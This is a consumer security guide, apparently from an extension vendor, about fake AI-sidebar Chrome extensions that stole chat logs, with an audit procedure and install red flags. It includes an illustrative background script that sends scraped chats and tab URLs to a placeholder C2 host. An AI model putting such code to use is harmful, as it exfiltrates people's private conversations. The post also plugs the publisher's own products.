STOP Extensions Stealing Your AI Chats: 5 Checks (2026)
900K users had ChatGPT & DeepSeek chats exfiltrated in 2026. How Prompt Poaching works, how to audit your extensions, and red flags before installing.
Key takeaways
- 900,000 users had AI conversations stolen by two extensions removed from the Chrome Web Store in early 2026.
- “Prompt Poaching” hides exfiltration inside a working AI assistant. Users never see anything wrong.
- A 5-step DevTools audit catches it in under 3 minutes. Open the extension’s service worker and watch the Network tab.
Your private AI conversations might already be on a server you’ve never heard of. Not hypothetically. In December 2025, two Chrome extensions with a combined 900,000 users were quietly sending every ChatGPT and DeepSeek conversation to an attacker-controlled server, every 30 minutes, while users had no idea anything was wrong. The extensions worked perfectly. That was the point.
What Happened: The 900,000-User Attack
OX Security discovered the attack in late 2025 and disclosed it in early 2026. Two extensions were impersonating AITOPIA, a legitimate extension developer on the Chrome Web Store: “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” (600,000 installs) and “AI Sidebar with Deepseek, ChatGPT, Claude and more” (300,000 installs).
Both extensions worked as described. You could open a chat interface, interact with AI, get responses. The surface layer was real. Running underneath: a background script that read full conversation content from the page DOM and transmitted it to a command-and-control server at 30-minute intervals. Chrome tab URLs were exfiltrated alongside the chat data.
The consent mechanism was cynical. During installation, users were prompted to agree to “anonymous analytics collection.” Most people click through that. The data being sent was anything but anonymous: it was the complete text of their AI conversations.
Both extensions were removed from the Chrome Web Store after OX Security’s disclosure. By then, 900,000 accounts had been exposed for weeks to months.
| | Extension A | Extension B |
|---|---|---|
| Name | Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI | AI Sidebar with Deepseek, ChatGPT, Claude and more |
| Install count (at removal) | ~600,000 | ~300,000 |
| Impersonated | AITOPIA (legitimate extension) | AITOPIA (legitimate extension) |
| Data exfiltrated | Full chat content + all tab URLs | Full chat content + all tab URLs |
| Exfiltration frequency | Every 30 minutes | Every 30 minutes |
| Consent framing | “Anonymous analytics” | “Anonymous analytics” |
| CWS status | Removed (early 2026) | Removed (early 2026) |
The AITOPIA impersonation detail matters. Someone who searched for AITOPIA-branded tools, saw something that looked right, and installed it had done what they were supposed to do: verify the source. The attack exploited the fact that CWS search returns results by popularity and keyword matching, not by verified publisher identity alone.
How Prompt Poaching Works
Secure Annex, the firm that named the technique, describes it as a multi-layer deception. Understanding the layers explains why it’s so hard to spot from the inside.
The extension’s visible behavior is completely legitimate. It connects to AI APIs, renders chat interfaces, stores preferences locally. Users get a real product. This isn’t a fake extension masquerading as functionality. It’s a real extension with a hidden payload.
The exfiltration code is structurally separate from the visible functionality. In both 2026 cases, a background script ran on a timer independent of user actions. Every 30 minutes, regardless of whether the user was actively chatting, the script swept the DOM of any open AI chat tabs and packaged the content. The payload went to a domain registered specifically for the attack, not a recognizable ad analytics endpoint that might trigger suspicion.
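To make the mechanism concrete, here is a rough sketch of what a background script of this shape looks like. This is illustrative, not the actual malware source (which hasn’t been published in full); the C2 domain, interval constant, and payload shape are invented placeholders, and the Chrome-specific calls are shown as comments:

```javascript
// Hypothetical sketch of a Prompt Poaching background script.
// The C2 endpoint and payload format below are invented placeholders.
const C2_ENDPOINT = "https://collector.example-c2.invalid/ingest"; // attacker-controlled
const INTERVAL_MS = 30 * 60 * 1000; // fires every 30 minutes, independent of user actions

// Pure helper: package scraped chat text and open-tab URLs into one payload.
function buildPayload(conversations, tabUrls) {
  return JSON.stringify({
    ts: Date.now(),
    conversations, // full chat text swept from the page DOM
    tabs: tabUrls, // every open tab URL, exfiltrated alongside the chats
  });
}

// In a real extension, the service worker would wire it up roughly like this:
// setInterval(async () => {
//   const tabs = await chrome.tabs.query({});            // needs the "tabs" permission
//   const chats = await scrapeChatTabs(tabs);            // content-script DOM sweep (hypothetical helper)
//   fetch(C2_ENDPOINT, {
//     method: "POST",
//     body: buildPayload(chats, tabs.map((t) => t.url)),
//   });
// }, INTERVAL_MS);
```

Note that nothing here depends on the user interacting with the extension, which is why the visible product can behave flawlessly while this runs.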
The “analytics consent” framing is deliberate. Broad, vaguely-worded consent buried in an onboarding flow is legally useful (claimed consent) and psychologically effective (users feel they agreed to something, even if they didn’t understand what). Extensions that ask for analytics permission during install and then send conversation content can argue users consented. A weak argument, but it complicates enforcement.
What makes this attack class persistent:

- Permissions survive updates. Once you grant `<all_urls>` or host permissions for specific AI chat domains, those permissions persist through every future update. The developer can add exfiltration code to a subsequent update without triggering a new permission request.
- 60% of Chrome extensions haven’t been updated in over 12 months. A legitimate, unmaintained extension with broad permissions is an attractive acquisition target. Buy it, push an update with exfiltration code, collect data from users who vetted the extension months or years ago.
- The Chrome Web Store review process is not comprehensive. Malicious behavior disguised in otherwise-functional extensions can pass initial review. The 2026 extensions were removed after external disclosure, not caught by Google proactively.
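The permission grant that survives updates lives in the extension’s manifest. A hypothetical Manifest V3 manifest like the one below, once approved by the user at install time, lets every future version of `background.js` read any page and every tab URL without a new prompt:

```json
{
  "name": "Example AI Sidebar",
  "manifest_version": 3,
  "permissions": ["storage", "tabs"],
  "host_permissions": ["<all_urls>"],
  "background": { "service_worker": "background.js" }
}
```

The `host_permissions` entry is the one to watch: `<all_urls>` grants page access everywhere, and the `tabs` permission exposes the URL of every open tab.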
How to Audit Your Extensions in 5 Steps
This works for any extension, not just AI tools. It takes under 3 minutes per extension.
Step 1: Open the extension’s service worker.
Go to chrome://extensions and enable Developer Mode (toggle in the top right). Find the extension you want to audit and click “service worker” or “background page.” This opens a DevTools panel connected to the extension’s background context.
Step 2: Clear the Network tab and start monitoring.
In the DevTools panel, go to the Network tab. Press the red circle (record) button if it isn’t already active. Clear existing requests with the no-entry icon. You want a clean baseline.
Step 3: Use an AI chatbot normally.
Open ChatGPT, Claude, DeepSeek, or whichever AI tool you normally use. Send a few messages. Have a real conversation, including phrases you’d never want shared. Let the page sit for a few minutes.
Step 4: Inspect what requests fired.
Look at what appeared in the Network tab. A legitimate AI assistant extension should send requests to the AI provider’s own API domain (api.openai.com, api.anthropic.com, etc.) and nowhere else. If you see requests to domains you don’t recognize, especially domains that aren’t the AI provider’s own infrastructure, that warrants investigation.
Step 5: Check request payloads.
Click on any suspicious request and look at the request body in the Payload tab. Legitimate requests to AI APIs will contain your messages in an expected API format. Requests to unknown domains containing conversation text are a strong signal of exfiltration.
An extension with zero telemetry will show no unexpected outbound requests. Zero requests to third parties is verifiable. You can confirm it yourself rather than trusting any claim the developer makes.
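The domain check in Step 4 can be sketched as a simple allowlist comparison. The provider list below is illustrative, not exhaustive; extend it with whatever APIs the extension legitimately needs:

```javascript
// Flag Network-tab request URLs that go anywhere other than known AI provider APIs.
// This allowlist is an illustrative starting point, not a complete list.
const EXPECTED_HOSTS = new Set([
  "api.openai.com",
  "api.anthropic.com",
  "api.deepseek.com",
]);

function suspiciousRequests(urls) {
  return urls.filter((u) => {
    const host = new URL(u).hostname;
    // Any host outside the allowlist is worth investigating in the Payload tab.
    return !EXPECTED_HOSTS.has(host);
  });
}
```

Copy the request URLs out of the Network tab and run them through this function; any non-empty result is a request whose payload deserves a close look in Step 5.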
Red Flags Before You Install
Prevention is more practical than auditing after the fact. These patterns are common to AI extensions that turn out to be data collection tools.
| Signal | What it means |
|---|---|
| Requests `<all_urls>` permission | Extension can read all pages you visit, not just AI chat domains |
| Vague “analytics” consent during onboarding | Common framing for exfiltration consent |
| Developer is anonymous or has no verifiable web presence | No accountability if something goes wrong |
| Extension name closely resembles a well-known tool | Name spoofing is common in impersonation attacks |
| Privacy policy uses “aggregate data” or “third-party partners” | Disclosure language for data sharing |
| Extension was recently published with high initial ratings | Fake reviews are used to surface new malicious extensions |
| No Featured badge | Google reviews Featured extensions for policy compliance — not a guarantee, but a bar |
| Extension requests permissions unrelated to its stated function | A tab manager that wants access to all URLs doesn’t need it |
The permission check is the fastest signal. When Chrome shows you the installation permission prompt, read it. `<all_urls>` plus the ability to read page content is a combination that gives any extension access to everything you see in the browser, including AI chat conversations.
The Broader Pattern in 2026
The Prompt Poaching attacks are not isolated. The same quarter saw 287 extensions found leaking user data, reported by The Register in February 2026. Separate from that, 36 extensions were compromised in a supply chain attack — the extensions themselves were legitimate, but their upstream dependencies or update servers were hijacked. CVE-2026-0628 allowed low-privilege extensions to inject code into Chrome’s native Gemini panel, gaining access to context those extensions never should have had.
These incidents share a common thread: the Chrome extension model gives installed software significant access to browser context, and that access can be exploited in ways that aren’t visible to the user during normal operation.
The 52% figure from Incogni’s research (more than half of AI-powered Chrome extensions collect user data) isn’t shocking in this context. It’s structural. Extensions that wrap AI chat interfaces need broad host permissions to function. Those same permissions enable data collection. The difference between a legitimate extension that uses those permissions for its stated purpose and one that uses them for exfiltration is invisible from the user’s side without a DevTools audit.
Fewer Extensions, Better Hygiene
Every extension you install is a trust decision that persists until you reverse it. The safest approach to AI chat privacy is the simplest: use AI tools directly in their own tabs rather than through an extension layer. ChatGPT, Claude, and DeepSeek all work in a browser tab without a sidebar extension. The extension layer adds convenience. It also adds an attack surface.
If you do use AI extensions, the checklist above (permissions audit, DevTools network monitor, developer verification) takes under 5 minutes total and catches the pattern that affected 900,000 users in 2026.
Separately from AI chat risks, the extensions you already have installed shape your browser’s exposure to tracking and data collection. SuperchargePerformance blocks 186,000+ tracking, advertising, and analytics rules from 22 verified open-source blocklists. That includes the category of analytics endpoints that exfiltration attacks often route data through. It runs 100% locally, has zero telemetry, requires no account, and carries the Featured badge on the Chrome Web Store — meaning Google has reviewed it for policy compliance. SuperchargeNavigation, the companion extension for tab and workspace management, uses the same architecture: everything local, nothing transmitted, no external dependencies.
Neither extension requires trusting any claim about data handling. The zero telemetry is verifiable in DevTools the same way the audit steps above are.
What to Do If You Had Either Affected Extension
If you installed either of the removed extensions — “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” or “AI Sidebar with Deepseek, ChatGPT, Claude and more” — there are a few concrete steps worth taking.
Remove the extension immediately if it’s still installed. On Chrome 146, go to chrome://extensions and click Remove. This stops any ongoing exfiltration, though it doesn’t affect data already sent.
Review your AI chat history. ChatGPT, Claude, and DeepSeek all maintain conversation history in your account. Look for any sessions that seem unusual or that you don’t recognize, as a sign that account access may have been shared.
Check for account access you didn’t grant. Any service where you used AI tools while the malicious extension was active should be reviewed. API keys in particular: if your ChatGPT API key was visible in any chat session, rotate it.
If you granted the “anonymous analytics” consent during installation, consider whether any conversations contained sensitive professional or personal information. The data was sent to a server you have no visibility into. Treat those conversations as compromised.
The 900,000-user figure is large enough that this isn’t a niche concern. If you’ve installed AI assistant extensions in the past six months, running the 5-step audit above is worth the three minutes it takes.
Frequently Asked Questions
Can Chrome extensions read my ChatGPT or Claude conversations?

Yes. Any extension with host permissions for the chat domain (or `<all_urls>`) can read the full conversation text from the page DOM, whether or not you interact with the extension.

What is Prompt Poaching?

A technique, named by Secure Annex, in which a fully functional AI assistant extension hides a background script that exfiltrates chat content and tab URLs to an attacker-controlled server on a timer.

How do I check if an extension is stealing my AI conversations?

Open the extension’s service worker from chrome://extensions with Developer Mode enabled, watch the Network tab while you chat, and inspect any requests to domains that aren’t the AI provider’s own infrastructure. The full 5-step audit above takes under 3 minutes.

Which Chrome extensions were caught stealing AI conversations in 2026?

“Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” (~600,000 installs) and “AI Sidebar with Deepseek, ChatGPT, Claude and more” (~300,000 installs), both impersonating AITOPIA and both removed from the Chrome Web Store after OX Security’s disclosure.

Is it safe to use AI extensions in Chrome?

Only with vetting: check permissions before installing, prefer developers with a verifiable web presence, and run the DevTools audit. Using AI tools directly in their own browser tabs avoids the extension attack surface entirely.